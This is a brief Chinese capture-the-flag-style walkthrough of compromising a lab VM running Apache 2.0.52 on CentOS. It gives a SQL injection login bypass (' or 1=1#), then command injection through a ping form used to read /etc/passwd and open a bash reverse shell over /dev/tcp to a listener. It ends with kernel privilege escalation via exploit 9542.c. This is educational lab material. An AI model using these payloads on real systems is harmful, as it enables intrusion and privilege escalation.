#信息收集
同样是netdiscover收集信息,发现目标IP地址。
目标的IP地址为192.168.43.47
nmap扫描端口信息
#漏洞利用
存在80/tcp open http Apache httpd 2.0.52 ((CentOS))端口
尝试万能密码' or 1=1# ,成功登录。
可以看到一个执行ping命令的框框。
可见是一个命令执行漏洞。
在命令执行中是有| && || ;这些常见的符号的。
这里我们可以利用| ;进行命令执行
测试cat /etc/passwd
下面用命令执行一个交互shell.
;bash -i >& /dev/tcp/192.168.43.177/2333 0>&1
同时用nc监听2333端口。
得到一个交互shell。但是权限是apache用户。
#权限提升
当前的权限是apache用户,我们需要对他进行提权得到root权限。
查看当前系统版本。searchsploit linux 2.6.9查找相关提权漏洞
利用到9542.c的exp.
提权成功。
如果有任何疑问,欢迎添加qq群测试入门大神 755431660 共同学习~
领取专属 10元无门槛券
私享最新 技术干货